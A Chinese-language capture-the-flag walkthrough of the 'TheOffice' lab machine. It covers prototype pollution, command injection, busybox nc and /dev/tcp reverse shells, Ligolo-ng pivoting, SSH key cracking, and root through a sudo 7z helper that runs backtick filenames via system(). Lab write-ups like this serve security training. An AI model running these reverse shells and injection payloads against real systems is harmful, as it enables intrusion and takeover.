TheHackersLabs-TheOffice靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.148  08:00:27:7a:26:98       (Unknown)
192.168.60.254  00:50:56:e0:55:bd       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.945 seconds (131.62 hosts/sec). 4 responded
❯ export ip=192.168.60.148
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.148:22
Open 192.168.60.148:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 20:26 CST
Initiating ARP Ping Scan at 20:26
Scanning 192.168.60.148 [1 port]
Completed ARP Ping Scan at 20:26, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:26
Scanning 192.168.60.148 [2 ports]
Discovered open port 22/tcp on 192.168.60.148
Discovered open port 80/tcp on 192.168.60.148
Completed SYN Stealth Scan at 20:26, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.148
Host is up, received arp-response (0.00053s latency).
Scanned at 2025-01-08 20:26:36 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 63
MAC Address: 08:00:27:7A:26:98 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

访问一下，没什么按钮可以点的

扫一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login                (Status: 200) [Size: 4713]
/admin                (Status: 401) [Size: 9]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

有个admin，提示我们可以用guest登录

原型链污染

不过我们可以curl看到源代码中藏了注释

其中是看着像是json数据，丢给GPT解释一下

❯ curl $ip
…………省略…………
<!--
credentials = ['{"username":"admin", "password": "' + crypto.randomBytes(64).toString("hex") + '", "cookie": "' + crypto.randomBytes(64).toString("hex") + '", "isAdmin":true}',
'{"username":"guest", "password":"guest", "cookie": "' + crypto.randomBytes(64).toString("hex") + '"}'];
-->%

该代码段构造了一个包含两个用户的数组。第一个用户是一个管理员（admin），密码和 cookie 是随机生成的；第二个用户是一个游客（guest），密码为固定值 guest，cookie 也是随机生成的。 crypto.randomBytes(64).toString("hex") 用于生成高强度的随机字节，常用于加密和安全性操作。

简单来说就是可以利用JavaScript原型链污染，来使我们的isAdmin变为True

至于什么是原型链污染可以看看这篇文章

深入理解 JavaScript Prototype 污染攻击 | 离别歌

如果你使用guest的用户登入然后执行命令的话，会提示you are not admin

那我们尝试在这个页面上抓一下包，把admin改为true不就完事了

抓到包，我们将Cookie清空，将内容类型改为json

可以看到发送成功了，不过返回包会显示未授权，这个问题不大

我们再次回来执行命令，返回的弹窗我翻译一下”存在这个进程”

这是个类似进程检查器的东西，所以我尝试命令注入

为了更直观显示，我尝试ping本机，能否抓到包

那没啥好说的了，直接弹shell吧

我尝试直接用nc是弹不过来的，可能靶机上没装nc

那可以用busybox里面带的nc

用户提权

监听一下端口

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.148] 33383
id
uid=1000(node) gid=1000(node) groups=1000(node)

这个靶机没有bash，只能用sh，有点难受了

赶紧写个公钥上去，用ssh连吧，不是，为什么我用私钥连不上啊❓

算了这个不稳定的shell太难用了，凑合一下

我们可以看到有个ash_history

看一下都敲了什么命令，好像是用agent代理连了一下某端口

不过在ftp发现用户凭证

ls -al
total 36
drwxr-sr-x    1 node     node          4096 Jan 12 11:31 .
drwxr-xr-x    1 root     root          4096 May  2  2024 ..
-rw-------    1 node     node           590 May 13  2024 .ash_history
-rw-r--r--    1 node     node            31 May  7  2024 .ftp
drwxr-sr-x    4 node     node          4096 May  6  2024 .npm
drwx------    2 node     node          4096 Jan 12 11:33 .ssh
drwxr-sr-x    1 node     node          4096 Jan 12 11:26 app
cat .ash_history
cd ..
ls
wget http://10.0.2.5/agent
chmod +x agent
cat .ftp
./agent -connect 10.0.2.5:11601 -ignore-cert
cd ..
cd app/
busybox nc 10.0.2.5 8888 sh
busybox nc 10.0.2.5 8888 -e sh
ls
export TERM=xter
reset
export TERM=xterm
reset
ip a
export TERM=xterm
reset
ls
cd ..
wget http://10.0.2.5/agent
ls
./agent -connect 10.0.2.5:11601 -ignore-cert
ls -la ~
cat .ftp
./agent -connect 10.0.2.5:11601 -ignore-cert
cd ..
cd /tmp
ls
busybox nc 10.0.2.5 8888 -e sh
ls
export TERM=xterm
reset
wget http://10.0.2.5/agent
chmod +x agent
./agent
./agent -h
file agent
ls
cd ..
ls
./agent
rm agent
ls
exit
cat .ftp
carlton:gQzq2tG7sFxTm5XadrNfHR

Ligolo代理

但我们在上面探测服务的时候并没开放21端口，我看了一下靶机的ip，发现系统是在docker中的

难怪我说啥工具都没有呢，这么纯净

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
    link/ether 02:42:ac:65:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.101.0.2/28 brd 172.101.0.15 scope global eth0
       valid_lft forever preferred_lft forever

靶机tmp目录下就存在agent工具

我们可以利用Ligolo-ng代理工具，先去github上下载

Tunneling and Port Forwarding - HackTricks

nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

❯ wget https://ghproxy.cc/https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
--2025-01-12 19:56:42--  https://ghproxy.cc/https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
Resolving ghproxy.cc (ghproxy.cc)... 172.67.134.196, 104.21.6.115, 2606:4700:3037::ac43:86c4, ...
Connecting to ghproxy.cc (ghproxy.cc)|172.67.134.196|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5029070 (4.8M) [application/octet-stream]
Saving to: ‘ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz’

ligolo-ng_proxy_0.7.5_linux_amd64.t 100%[================================================================>]   4.80M  11.4MB/s    in 0.4s

2025-01-12 19:56:44 (11.4 MB/s) - ‘ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz’ saved [5029070/5029070]

解压完得到proxy二进制文件

❯ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

利用靶机上已经存在agent连接发现可以连上，但ligolo-ng这边收不到session

查看文档才发现agent和proxy版本需要相同

靶机上的agent删了重新wget了kali的版本

因为我们是>v0.6版本的，可以直接创建tun接口

❯ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0020] Creating a new "ligolo" interface...
INFO[0020] Interface created!
-----------分隔线-------------
/tmp $ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"

同时proxy也能收到session了，我们开启tun模式

具体操作可以参考官方文档

Quickstart · nicocha30/ligolo-ng Wiki

❯ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » INFO[0024] Agent joined.                                 id=8496b142-e9bd-432d-8e24-8f9921bee2ce name=node@webserver remote="192.168.60.148:37340"
ligolo-ng » session
? Specify a session :  [Use arrows to move, type to filter]
> 1 - node@webserver - 192.168.60.148:37340 - 8496b142-e9bd-432d-8e24-8f9921bee2ce
[Agent : node@webserver] » tunnel_start --tun ligolo
[Agent : node@webserver] » INFO[0353] Starting tunnel to node@webserver (8496b142-e9bd-432d-8e24-8f9921bee2ce)

同时不要关闭proxy，设置一下路由

❯ sudo ip route add 172.101.0.0/28 dev ligolo
❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
       valid_lft forever preferred_lft forever
5: ligolo: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 500
    link/none

这时候我们直接扫172.101.0.0/28整个网段

❯ rustscan -a 172.101.0.0/28
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.101.0.3:21
Open 172.101.0.1:22
Open 172.101.0.4:22

从这可以得知靶机开了三个docker，在0.3主机中开放了21

获取用户私钥

尝试连接，从上文拿到的用户，下载了私钥

❯ ftp [email protected]
dir
Connected to 172.101.0.3.
220 Welcome to my FTP server.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||30916|)
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000         3434 May 06  2024 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||30652|)
150 Opening BINARY mode data connection for id_rsa (3434 bytes).
100% |************************************************************************************************|  3434        1.71 MiB/s    00:00 ETA
226 Transfer complete.
3434 bytes received in 00:00 (993.92 KiB/s)
ftp>

但凡是这个靶场的靶机私钥都加密的，爆破一下

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
lawrence         (id_rsa)
1g 0:00:00:21 DONE (2025-01-12 20:40) 0.04750g/s 44.08p/s 44.08c/s 44.08C/s hawaii..lawrence
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

不过不知道是哪个用户的，我们可以看一下密钥的备注

❯ ssh-keygen -c -f id_rsa
Enter passphrase:
Old comment: willsmith@server
New comment:

尝试利用此用户名，登入哪台主机不知道，从上面的扫描结果得到除了连接的2主机本机外只有1和4主机开放了22

都尝试一遍发现都不行，回头看其他师傅的WP才知道漏扫了一个IP

连上11主机的ssh，终于上来了

好不容易拿到了user

❯ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Linux office 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May  8 21:48:44 2024 from 172.101.0.2
willsmith@office:~$ ls -al
total 64
drwxr-xr-x 1 willsmith willsmith 4096 May  8  2024  .
drwxr-xr-x 1 root      root      4096 May  6  2024  ..
-rw------- 1 willsmith willsmith  600 May  8  2024  .bash_history
-rw-r--r-- 1 willsmith willsmith  220 Apr 23  2023  .bash_logout
-rw-r--r-- 1 willsmith willsmith 3526 Apr 23  2023  .bashrc
-rw-r--r-- 1 willsmith willsmith   33 May  7  2024  .ftp
-rw-r--r-- 1 willsmith willsmith  807 Apr 23  2023  .profile
drwxr-xr-x 1 willsmith willsmith 4096 May  6  2024  .ssh
-rw-r--r-- 1 willsmith willsmith  131 May  8  2024 '`bash shell.sh`.7z'
-rw-r--r-- 1 willsmith willsmith  131 May  8  2024 '`whoami`.7z'
-rw-r--r-- 1 willsmith willsmith   51 May  8  2024  shell.sh
-rw-r--r-- 1 willsmith willsmith  131 May  8  2024  test.7z
-rw-r--r-- 1 willsmith willsmith    5 May  8  2024  test.txt
-rw-r--r-- 1 willsmith willsmith   39 May  7  2024  user.txt
willsmith@office:~$ cat user.txt
flag{61992ce8bc28cb06461c82d62584e718}

发现history没有清除，看一下都做了什么操作

willsmith@office:~$ cat .bash_history
ls -la
cat user.txt
cat .ftp
sudo -l
echo 'test' > test.txt
7zz a test.7z test.txt
clear
cp test.7z '’whoami’'.7z
ls
rm *.7z
ls
7zz a test.7z test.txt
'`whoami`'
cp test.7z '`whoami`'.7z
ls
sudo /opt/uncompress /home/willsmith/'`whoami`'.7z
touch shell.sh
cp test.7z '`bash shell.sh`'.7z
nano shell.sh
vi shell.sh
echo '#!/bin/bash;bash -i >& /dev/tcp/10.0.2.5/9000 0>&1' > shell.sh
sudo /opt/uncompress /home/willsmith/'`bash shell.sh`'.7z
pwd
ls
rm shell.sh
wget http://10.0.2.5/shell.sh
curl http://10.0.2.5/shell.sh -o shell.sh
sudo /opt/uncompress /home/willsmith/'`bash shell.sh`'.7z

Root提权

Sudo权限

很明显故意留了一个漏洞，有sudo权限利用uncompress来解压7z文件，但是这玩意怎么提权呢

willsmith@office:~$ sudo -l
Matching Defaults entries for willsmith on office:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User willsmith may run the following commands on office:
    (ALL) NOPASSWD: /opt/uncompress

当我以为很快就结束的时候，思路又断了

想起来0.3主机的ftp还没有利用，同时0.11主机上还保存有.ftp

willsmith@office:~$ cat .ftp
willsmith:2j9ptYyw3uKJHxLb6ZzRNh
-----------分隔--------------------
❯ ftp [email protected]
Connected to 172.101.0.3.
220 Welcome to my FTP server.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||30948|)
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001         1156 May 06  2024 uncompress.c
226 Directory send OK.
ftp> get uncompress.c
local: uncompress.c remote: uncompress.c
229 Entering Extended Passive Mode (|||30453|)
150 Opening BINARY mode data connection for uncompress.c (1156 bytes).
100% |************************************************************************************************|  1156        1.32 MiB/s    00:00 ETA
226 Transfer complete.
1156 bytes received in 00:00 (806.93 KiB/s)
ftp>

拿到一个uncompress.c的源文件

❯ cat uncompress.c
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>

bool is_valid_7z(const char *filename) {
    FILE *file = fopen(filename, "rb");
    if (!file) {
        perror("Error opening file");
        return false;
    }

    // Check if the first six bytes are "7z\xBC\xAF\x27\x1C" (7z file signature)
    unsigned char signature[6];
    fread(signature, sizeof(unsigned char), 6, file);

    if (signature[0] == '7' && signature[1] == 'z' && signature[2] == 0xBC &&
        signature[3] == 0xAF && signature[4] == 0x27 && signature[5] == 0x1C) {
        fclose(file);
        return true;
    }

    fclose(file);
    return false;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <file>\n", argv[0]);
        return 1;
    }

    const char *filename = argv[1];
    if (is_valid_7z(filename)) {
        printf("%s is a valid 7z file.\n", filename);
        // Execute 7z x command
        char command[100];
        snprintf(command, sizeof(command), "7zz x %s", filename);
        system(command);
    } else {
        printf("%s is not a valid 7z file.\n", filename);
    }

    return 0;
}

我直接丢个GPT解释一下

该程序首先检查输入文件是否为有效的 .7z 文件（通过检查文件的魔数）。

如果文件有效，使用系统命令 7zz x 解压文件。

如果文件无效，则告知用户该文件不是有效的 .7z 文件。

正好家目录提供了一个whoami的7z文件，测试一下

果然输出root了

willsmith@office:~$ sudo /opt/uncompress  '`whoami`.7z'
`whoami`.7z is a valid 7z file.

7-Zip (z) 22.01 (x64) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15
 64-bit locale=C.UTF-8 Threads:1

Scanning the drive for archives:

ERROR: errno=2 : No such file or directory
root.7z



System ERROR:
errno=2 : No such file or directory

然后家目录还有 shell.sh，修改一下尝试反弹个shell吧

willsmith@office:~$ sed -i 's/10.0.2.5\/8888/192.168.60.100\/1234/g' shell.sh
willsmith@office:~$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.60.100/1234 0>&1
willsmith@office:~$ sudo /opt/uncompress  '`bash shell.sh`.7z'
`bash shell.sh`.7z is a valid 7z file.
-----------------分割线----------
❯ pwncat-cs -lp 1234
❯ pwncat-cs -lp 1234
[21:45:15] Welcome to pwncat 🐈!                                                                                              __main__.py:164
[21:45:21] received connection from 192.168.60.148:49064                                                                           bind.py:84
[21:45:22] 192.168.60.148:49064: registered new host w/ db                                                                     manager.py:957
(local) pwncat$

(remote) root@office:/home/willsmith# cd ~
(remote) root@office:/root# ls
office.thl
(remote) root@office:/root# cat office.thl
office:P4mDjcVfqrj7eEXBV7EX

又拿到一个新的用户凭证

这次不用登入docker中的主机了，直接ssh连接宿主机，你别忘了宿主机也开放的80和22端口

我们可以看到每个文件夹就是一个docker build的所需要的文件

❯ ssh [email protected]
[email protected]'s password:
Linux TheOffice 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May  9 00:19:00 2024 from 10.0.2.5
office@TheOffice:~$ ls
app  app.tgz  ftp  laptop  server
office@TheOffice:~/laptop$ sudo docker ps
CONTAINER ID   IMAGE       COMMAND                  CREATED        STATUS          PORTS                               NAMES
14a283a0ab1c   ftpserver   "vsftpd /etc/vsftpd/…"   8 months ago   Up 24 minutes   21/tcp                              ftpserver
2cf2ce43c67c   server      "/usr/sbin/sshd -D"      8 months ago   Up 48 minutes   22/tcp                              server
489413ef27e2   webapp      "docker-entrypoint.s…"   8 months ago   Up 48 minutes   0.0.0.0:80->80/tcp, :::80->80/tcp   webserver
8f7850553ea6   laptop      "/usr/sbin/sshd -D"      8 months ago   Up 48 minutes   22/tcp                              laptop
office@TheOffice:~/ftp$ sudo -l
[sudo] contraseña para office:
Matching Defaults entries for office on TheOffice:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User office may run the following commands on TheOffice:
    (ALL : ALL) ALL

直接切换root

office@TheOffice:~/ftp$ sudo su
root@TheOffice:/home/office/ftp# cd ~
root@TheOffice:~# ls
root.txt
root@TheOffice:~# cat root.txt
flag{f73a64a82b4dbeaf43f308999c5b380f}

这个靶机有点像打内网的或者需要一层一层跳，不过好在打完了

这个7z能利用反括号执行命令我是没有想到的